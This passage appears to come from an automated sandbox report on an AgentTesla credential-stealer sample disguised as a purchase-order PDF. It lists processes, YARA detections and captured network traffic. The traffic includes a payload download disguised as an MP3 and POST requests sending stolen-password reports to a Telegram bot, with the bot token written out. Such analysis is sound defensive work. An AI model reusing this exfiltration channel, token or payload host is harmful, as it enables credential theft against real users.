                                          {"ok":true,"result":{"message_id":162,"from":{"id":7162202130,"is_bot":true,"first_name":"xxxyyyzzznexy","username":"xxxyyyzzzz_bot"},"chat":{"id":1673719962,"first_name":"Good","last_name":"Fellas","type":"private"},"date":1728015741,"document":{"file_name":"user-648351 2024-10-04 00-22-18.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAOiZv9tfXKuxBDwovgHaHH9ZNSo_VwAAmQWAAJIsvlTPZWKmJq7IPY2BA","file_unique_id":"AgADZBYAAkiy-VM","file_size":319},"caption":"New PW Recovered!\n\nTime: 10/04/2024 00:22:18\nUser Name: user/648351\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.44974067.212.175.162443824C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-04 04:22:25 UTC84OUTGET /rigasin/Chody.mp3 HTTP/1.1
                                          Host: wymascensores.com
                                          Connection: Keep-Alive
                                          2024-10-04 04:22:25 UTC209INHTTP/1.1 200 OK
                                          Date: Fri, 04 Oct 2024 04:22:25 GMT
                                          Server: Apache
                                          Last-Modified: Thu, 03 Oct 2024 06:29:50 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 960520
                                          Connection: close
                                          Content-Type: audio/mpeg
                                          2024-10-04 04:22:25 UTC7983INData Raw: 14 1e 1b 18 84 68 0a 32 47 98 96 7b fc 60 fd 01 8b 18 c6 21 e4 e8 12 d9 8a ee ac 02 45 a1 c1 ef 40 05 9a d6 79 68 6a 91 bd 1d f7 4a ca eb 37 21 16 8e 61 d0 c5 23 4b b3 98 33 20 bd 18 07 3c c1 30 3d f0 c6 cc ce 29 b8 8d 98 f9 2e 3e 4d b3 02 a7 76 19 59 01 db 3f d0 0c f5 ce c8 e6 ea c4 cc 03 37 0b 71 7e ec 53 af ed 89 c2 71 f8 ec 97 c6 12 02 3c 33 e4 d2 ae 54 f4 47 e9 3a fa 79 4e 37 b3 0e 19 e7 b9 62 69 1b 2e 19 ce 83 a1 ab c2 c0 f4 ee 2a 0d a8 3c 9d 41 33 8f c2 32 af 34 c5 a5 bd 1c a4 c3 a3 71 79 c0 12 4f 3d ba d7 11 3c 91 b4 28 d7 67 18 59 f9 c9 c2 b4 38 7c 2c 65 22 8e 22 1e 27 9b db fd d5 47 46 38 a7 67 f1 24 36 1b cc a1 b8 b9 c0 18 50 81 28 26 53 6b b0 0f cf 2a 16 47 5c 67 b4 57 45 f8 93 c7 44 62 1a 2e 3e 85 32 48 f4 9a ee bc e1 47 e5 da 3b be ab 55 ff
                                          Data Ascii: h2G{`!E@yhjJ7!a#K3 <0=).>MvY?7q~Sq<3TG:yN7bi.*<A324qyO=<(gY8|,e""'GF8g$6P(&Sk*G\gWEDb.>2HG;U
                                          2024-10-04 04:22:25 UTC8000INData Raw: 86 9b be 33 e5 4f d0 9c 08 49 37 1b 67 ce 55 5d e1 61 36 7c dd fc da e5 99 0d c6 5f eb 1b f9 b7 33 3c 83 ad 8f 34 60 f5 93 75 c3 68 9a fc a4 89 79 67 c1 f8 aa ef 45 91 e2 a5 fc 10 12 b3 5a a6 9e 90 26 b5 36 3a 33 95 82 f6 6a 25 ea 0c eb 79 3c 3d 10 5a 5d 8f 92 b5 b8 50 60 a9 10 0d 01 aa ca 65 a9 01 73 44 a1 71 e1 2c 0d 05 54 29 47 d6 e0 b9 d0 fa da c3 b0 56 e5 10 45 59 ef 30 75 b0 ca 90 42 58 5f 2f 73 e5 3a a4 20 1c 60 b4 31 a3 45 83 7c 3f 3a ce a5 97 4a 93 70 f4 e1 16 38 97 a4 9e 20 30 4a fd 24 60 7f 10 83 40 7c d7 3a 2c b5 06 c6 8b a4 db b5 81 28 d4 84 1f 57 9f c5 a5 04 cd af 8b 2e 1a b5 ae b1 59 b6 e8 fb e0 88 3d 5b 01 67 3b 0c 03 ac b1 80 ee 06 42 1e 26 d4 5f a2 0c 12 41 46 0e 3e 77 9f 0c ab 04 83 2d 96 79 c1 70 e9 99 7b 04 2e 0f ee 05 e7 ef 5c ea af
                                          Data Ascii: 3OI7gU]a6|_3<4`uhygEZ&6:3j%y<=Z]P`esDq,T)GVEY0uBX_/s: `1E|?:Jp8 0J$`@|:,(W.Y=[g;B&_AF>w-yp{.\
                                          2024-10-04 04:22:25 UTC8000INData Raw: d6 14 66 2f f0 a4 81 2e e4 91 47 96 05 71 44 57 1d 8e 3d 1b 2a 66 08 68 1b 9b 9c 6b 6b 47 b7 ea 11 16 fa 33 f8 07 69 d1 3f 51 43 28 d8 de bb 54 9a c5 cd ca 63 62 72 4d 13 32 a2 c9 61 cb 54 42 21 a0 3a a5 9b 55 6a a5 40 d6 15 a7 fc 9f 45 d9 45 5b 7f 54 06 00 e1 51 9d 54 8e e3 45 45 03 3d 14 0f 16 e1 25 59 48 a1 c4 18 b3 b8 ff 70 5a 7b a9 46 73 1a b6 ef 58 4c 27 03 a1 eb 85 0a 4a 6b 58 81 ff e5 53 7b cf 62 dc 33 2a 78 b2 2a 1c 72 e1 f6 37 c9 42 2e 02 7c 20 93 7b 2b 5f 06 16 18 db b2 dc 9d bb a2 69 40 3e 64 41 81 00 aa 75 77 65 04 94 eb 90 aa 83 7f 2a 93 a5 84 5e a3 be 69 f0 f6 f8 ad b6 4f 26 5a 62 98 2a f2 23 3b bb 88 a8 fb 71 fb a5 49 ca 9d a6 c9 c6 dc a2 3b 90 81 a2 e0 75 d8 97 1f 7c 55 22 a5 73 ad 8b 12 2a 63 57 46 1a 34 1a bd 71 03 fb be d3 1b 78 92 58
                                          Data Ascii: f/.GqDW=*fhkkG3i?QC(TcbrM2aTB!:Uj@EE[TQTEE=%YHpZ{FsXL'JkXS{b3*x*r7B.| {+_i@>dAuwe*^iO&Zb*#;qI;u|U"s*cWF4qxX
                                          2024-10-04 04:22:25 UTC8000INData Raw: bd 19 ec f6 16 a0 5b f2 16 bd 32 49 a6 0b 90 5d e5 fc c0 c9 7c 43 1a 7b 93 79 9b 5e 25 cc 93 88 54 9c 33 69 0a 36 a6 b0 fe 92 70 4d 70 7c bc 49 5d 71 df 56 55 b0 42 bf fc 57 b0 26 11 61 16 d4 00 5e 6a 79 fd e6 3f 73 90 66 3a 32 e5 4f 80 13 08 97 6c 71 90 d0 70 e0 2e ee 2d 0e 2d 8f 2b 01 d4 01 63 6d 52 89 c0 50 12 ec b9 62 08 22 bf 3d 66 ad 56 ad 94 69 49 33 09 cb ac e3 44 27 14 21 5e b2 d0 18 09 2b e6 39 c9 f6 c6 d5 c3 22 81 bd c8 db ad 00 27 73 9a c6 2a a4 d8 64 7f 6c da 04 c6 69 33 f5 f4 50 c6 21 07 19 18 dc 52 b7 f2 a6 48 ba 68 a4 e5 84 5c be 86 14 eb d6 ff d9 6e 1b 6f 93 4f f9 8a ff ac f7 38 01 eb ac 2a e3 f7 fa 63 a0 67 4f 05 2a c9 83 58 01 b2 88 d4 67 e8 33 d0 68 78 f3 19 e6 95 0d 78 fe b4 93 c9 ac 13 49 0a 97 88 9c 9e 27 95 e2 1c 6c d8 78 98 5d 91
                                          Data Ascii: [2I]|C{y^%T3i6pMp|I]qVUBW&a^jy?sf:2Olqp.--+cmRPb"=fViI3D'!^+9"'s*dli3P!RHh\noO8*cgO*Xg3hxxI'lx]
                                          2024-10-04 04:22:25 UTC8000INData Raw: 39 cf 98 34 49 f0 56 e8 ae c9 1d 87 8d 3f 93 7c 5b dc cf bf ee 5c 48 37 66 78 5d 23 5d 91 41 b0 b8 9f 79 4a ed a9 0b 90 8d 0d fd 04 5b a0 2e ae 7c 81 21 fc d1 57 f5 b9 d5 54 d2 eb 21 67 b1 a4 6d d8 b2 21 e4 49 3b 0a 7e f0 0e 51 e9 0e 2a b0 38 63 30 b5 72 57 e3 ad 11 69 75 e3 8f da 7b 84 0f d4 76 c0 fe 26 af ff 14 2a a5 ce 0a 06 e1 e7 15 27 8f 95 4f b7 7f 4b 04 c0 a9 4b ef 69 4c 19 8f 03 23 b1 c1 fe 58 07 93 03 65 7e 63 e3 1f ef b5 18 5c c6 c4 84 bf b4 32 69 99 46 12 33 5f 62 35 c8 37 32 4a 28 11 0e 0e cc bd b5 4b b7 91 2e 8f 72 52 c6 dc d7 f7 e3 0a c6 e7 30 85 21 ab d1 c7 80 0d 7a 3e f3 fe b6 8d 5d 23 d9 a2 16 27 2c 32 c5 4d 82 1d e6 5b d4 4b ac 34 a4 5a 4b e5 11 47 bc 90 df f4 3a a5 08 0b 58 36 47 db 96 dd 5a be 5e 85 b3 15 78 6d 98 14 99 4e 37 74 56 15
                                          Data Ascii: 94IV?|[\H7fx]#]AyJ[.|!WT!gm!I;~Q*8c0rWiu{v&*'OKKiL#Xe~c\2iF3_b572J(K.rR0!z>]#',2M[K4ZKG:X6GZ^xmN7tV
                                          2024-10-04 04:22:25 UTC8000INData Raw: 85 cd af 3f d1 9d 9b d7 ce 37 ab 6c 36 8b 8b 7a 39 13 59 9e d9 1b 56 be e0 fe 5e 48 61 ab 99 cf f8 8f 48 b8 85 51 b9 a5 c7 61 3a ed 24 fe 02 58 3f 8e ee 9c 4d d0 60 34 2f 6b 4c b7 ec e2 32 49 fc 11 b0 19 c9 af b2 30 b7 1e 68 f3 b1 78 26 4f 9a c2 21 64 36 cc b0 f5 e1 bf 93 3b f2 88 53 3f 9f ff 52 57 3f ca d3 bf a3 01 a0 5a 4f 46 8f c5 a1 5d 92 33 99 ad c2 af 49 68 e3 64 86 95 84 12 4d 65 b2 0e 32 40 a9 5c a4 51 0a 6e 34 e3 87 ff 31 41 b9 38 fa 0b c4 3f 42 c7 f9 e0 43 30 6b f3 8d 70 a3 4c 17 36 a6 e1 cd bb ae b8 af 5a c7 31 cf aa 48 9f d3 5c f3 76 73 88 18 f4 48 0f 10 1c 7b 06 03 b0 65 25 a2 3b 1c fe 34 4f 73 aa 57 5d 5a ff 2c b0 d0 c3 8f d2 4e 99 67 e3 8c 62 4a 9b c2 bf 2c 7b 11 d9 75 22 5f de 22 b3 14 77 71 33 8f a6 0a a5 c3 b8 ef 3a 35 41 c0 3e 46 2f 7e
                                          Data Ascii: ?7l6z9YV^HaHQa:$X?M`4/kL2I0hx&O!d6;S?RW?ZOF]3IhdMe2@\Qn41A8?BC0kpL6Z1H\vsH{e%;4OsW]Z,NgbJ,{u"_"wq3:5A>F/~
                                          2024-10-04 04:22:25 UTC8000INData Raw: 11 05 8a 68 77 e7 d3 eb fd f7 a7 d8 40 11 f4 15 6d e0 3d 44 49 b5 38 3a d8 92 58 bf 22 29 c8 39 4c cc df 88 91 bf 0a 7d 71 ba 33 1d 2d 99 43 fc 32 15 58 0e fe 66 0e 56 55 10 37 9d 26 0d 8e 6e 7d ee 9e 23 c9 6d 9f 8e 35 f2 94 32 90 07 85 b4 a9 79 b1 12 87 41 07 3b 27 ed 51 37 94 be a4 1a ab 19 55 40 97 64 e8 1f f8 c6 53 36 6c b6 41 55 93 4a 43 b0 8c da ae 2b 1a 6b 01 67 6c 97 83 34 46 00 00 ac a4 93 57 91 51 06 c9 89 60 7c 21 61 6a 70 23 0a 10 73 2e cd 7b ed 1d 92 4b 78 38 a6 9f a9 e1 05 42 bb 7f b0 25 2e 55 8c 66 b1 11 e9 97 43 d1 4a 3d 1e aa 8d f9 6d 52 e8 41 4c 72 96 b5 a3 a8 47 74 3f 59 ea bb 35 cf 10 ac 4b 2a 8c ae bb 4d a6 29 39 b4 9e 0d 4f 50 72 da 17 44 93 9b ab 88 a3 08 f3 e4 34 17 57 ef 1e e7 93 7e 36 e1 de c1 27 bc a9 21 ba e6 2e b7 25 f4 f8 25
                                          Data Ascii: hw@m=DI8:X")9L}q3-C2XfVU7&n}#m52yA;'Q7U@dS6lAUJC+kgl4FWQ`|!ajp#s.{Kx8B%.UfCJ=mRALrGt?Y5K*M)9OPrD4W~6'!.%%
                                          2024-10-04 04:22:25 UTC8000INData Raw: b2 86 07 2a 7e d6 84 d6 21 4b 54 4c 2b 1f 55 c8 55 9b 14 6e 44 85 18 d7 2d a8 69 ba 1a 29 55 d7 a3 c9 ec da 9b 98 d6 5e 6f 41 04 c8 30 3c 9f c7 74 08 69 c7 b9 e0 77 c9 bd 09 14 42 be ba 50 2a 3a 49 e7 72 95 fb be bc b2 01 01 52 1f 6f 6b ee ae 2d ff ab 2a ca 85 2a eb 8c b4 7b df 1f e4 83 4c 38 8c fb cc 83 1a d4 83 ff 8b 30 55 c7 a5 5a 2d a6 d2 77 65 54 e7 3a 25 5c 01 05 ba 0f 19 04 65 93 6a 37 8b 14 c7 d0 9e af 16 ac 77 43 e4 0d 1c 20 50 00 77 3f 84 1f 22 9c c8 64 7d 24 2e 7e 1d 27 f8 06 00 52 c7 58 b8 50 a9 59 f4 e7 d0 7a f5 fd 79 20 2f a7 b3 50 74 8d a9 34 87 e7 10 f9 84 d6 93 79 88 f3 b9 b7 13 20 fc a1 f3 48 13 5c 82 01 ec 82 17 f0 be 89 fe 2c 29 80 86 0d f2 03 e2 d4 37 51 62 86 dd 5d e6 de 7a 81 96 47 fa 9f 51 05 55 cf 81 7d d6 90 f8 f1 26 6a ad 8e 52
                                          Data Ascii: *~!KTL+UUnD-i)U^oA0<tiwBP*:IrRok-**{L80UZ-weT:%\ej7wC Pw?"d}$.~'RXPYzy /Pt4y H\,)7Qb]zGQU}&jR
                                          2024-10-04 04:22:25 UTC8000INData Raw: ef 7f 4d 26 77 12 7c b7 06 b4 cd 76 11 78 b9 07 20 90 50 e6 66 b9 a9 2c ba 9e 0d 40 83 67 c2 f3 9f 13 27 e9 04 90 02 3e ed db ad 30 66 d5 1c bb e6 93 7d 7e f2 6c 5f 87 95 18 7a d7 f2 de 95 cf 2b 97 48 0d b2 9f 06 14 45 1e ca 90 67 b4 45 38 bc 21 df e2 62 2e 31 2d 8f f8 5e 1a 31 30 29 2f 54 c5 4c a5 5d 42 74 d3 6d ba 0c 3d b5 21 f4 29 1d 02 e2 5d 00 a0 b0 6d 68 6d 14 90 80 85 d4 ec 3d a0 5c 83 d4 5d f1 fd 6e d9 da be b3 3b c0 10 b5 a5 04 5d 1b bf 76 04 a9 ee 64 4f bb 8f 98 f4 5a 8d c7 de 8b 44 67 e6 4c ed 89 9a c9 e1 f1 7e b0 4c 94 e4 c2 db 35 24 1e 65 1f b2 2b 84 f1 ca 87 08 c6 f0 c1 f7 98 00 b5 7d e7 15 da 25 6b 67 bc a9 41 f5 66 aa dc c5 cd 38 d7 0f 4c 69 44 f8 9a 44 f3 43 61 2f 40 18 bf 87 bd e8 a2 15 0c 89 05 42 5e ae 71 a2 db 8a d2 3c 2d 5e 68 a3 55
                                          Data Ascii: M&w|vx Pf,@g'>0f}~l_z+HEgE8!b.1-^10)/TL]Btm=!)]mhm=\]n;]vdOZDgL~L5$e+}%kgAf8LiDDCa/@B^q<-^hU
                                          2024-10-04 04:22:25 UTC8000INData Raw: c1 6b ab 8c e4 da 40 ee 40 9d 46 d7 30 da 09 c2 12 e6 b9 26 a0 20 c5 d2 a0 66 89 bd b6 96 a3 e9 f0 9f de e7 b9 14 8e 31 0f f6 64 34 24 97 fc 32 2b 3c 7a c9 52 36 11 9a 88 e8 36 bd 4c d5 c0 09 69 56 43 0f 7e e2 89 ab cd 64 4f 05 bc c3 c8 c1 14 44 88 5d 60 71 6f 86 9d ed 7f 77 44 a9 0b 8a b6 9d 1c 6f 29 b2 b0 d2 3c 8f df a3 a0 f4 da 00 10 c5 e7 ac 81 18 da 64 fb 05 b0 e1 6d 01 8c f9 20 27 e6 a0 f8 00 03 76 d6 ac da 1f 76 12 19 6d 39 ba 6b ab 72 a2 b2 c1 50 f3 40 6c f5 18 32 70 00 49 18 3e 6d 88 d2 67 87 50 c7 d6 59 be 70 c6 69 16 24 47 f4 6f 62 ce 40 b4 3c 48 eb f2 17 f4 78 50 8f 52 6b c3 dc 56 a6 1c 93 a4 2b 28 56 45 30 25 6c a3 7c b6 50 9d cf 88 54 3a 82 58 55 11 0b ee 27 a5 e9 38 d6 45 5b 36 83 ce e0 d8 c2 47 70 ed 58 68 88 c7 f7 d6 c1 de 9b 6d 50 e3 47
                                          Data Ascii: k@@F0& f1d4$2+<zR66LiVC~dOD]`qowDo)<dm 'vvm9krP@l2pI>mgPYpi$Gob@<HxPRkV+(VE0%l|PT:XU'8E[6GpXhmPG


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.449741149.154.167.2204437012C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-04 04:22:28 UTC260OUTPOST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=---------------------------8dce40a9fdbe5e2
                                          Host: api.telegram.org
                                          Content-Length: 915
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          2024-10-04 04:22:28 UTC25INHTTP/1.1 100 Continue
                                          2024-10-04 04:22:28 UTC915OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 30 61 39 66 64 62 65 35 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 37 33 37 31 39 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 30 61 39 66 64 62 65 35 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 30 34 2f 32 30 32 34 20 30 30 3a 32 32 3a 32 36 0a 55 73 65 72
                                          Data Ascii: -----------------------------8dce40a9fdbe5e2Content-Disposition: form-data; name="chat_id"1673719962-----------------------------8dce40a9fdbe5e2Content-Disposition: form-data; name="caption"New PW Recovered!Time: 10/04/2024 00:22:26User
                                          2024-10-04 04:22:29 UTC1031INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Fri, 04 Oct 2024 04:22:29 GMT
                                          Content-Type: application/json
                                          Content-Length: 643
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          {"ok":true,"result":{"message_id":163,"from":{"id":7162202130,"is_bot":true,"first_name":"xxxyyyzzznexy","username":"xxxyyyzzzz_bot"},"chat":{"id":1673719962,"first_name":"Good","last_name":"Fellas","type":"private"},"date":1728015748,"document":{"file_name":"user-648351 2024-10-04 00-22-26.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAOjZv9thKqBrJLc81iDa7tLRSdmL68AAmUWAAJIsvlTecaMCjjZS_w2BA","file_unique_id":"AgADZRYAAkiy-VM","file_size":319},"caption":"New PW Recovered!\n\nTime: 10/04/2024 00:22:26\nUser Name: user/648351\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:00:22:01
                                          Start date:04/10/2024
                                          Path:C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe"
                                          Imagebase:0x6d0000
                                          File size:1'559'040 bytes
                                          MD5 hash:BFEA25F0CBF64304AAA2C361805D5E51
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1765937411.0000000006030000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:00:22:04
                                          Start date:04/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                          Imagebase:0x220000
                                          File size:42'064 bytes
                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1890943123.00000000025E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1890943123.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:00:22:14
                                          Start date:04/10/2024
                                          Path:C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe"
                                          Imagebase:0xc20000
                                          File size:1'559'040 bytes
                                          MD5 hash:BFEA25F0CBF64304AAA2C361805D5E51
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.1887638572.0000000003138000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 34%, ReversingLabs
                                          • Detection: 25%, Virustotal, Browse
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:00:22:17
                                          Start date:04/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                          Imagebase:0xb0000
                                          File size:42'064 bytes
                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1970737045.000000000258E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1970737045.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:00:22:22
                                          Start date:04/10/2024
                                          Path:C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe"
                                          Imagebase:0x7a0000
                                          File size:1'559'040 bytes
                                          MD5 hash:BFEA25F0CBF64304AAA2C361805D5E51
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
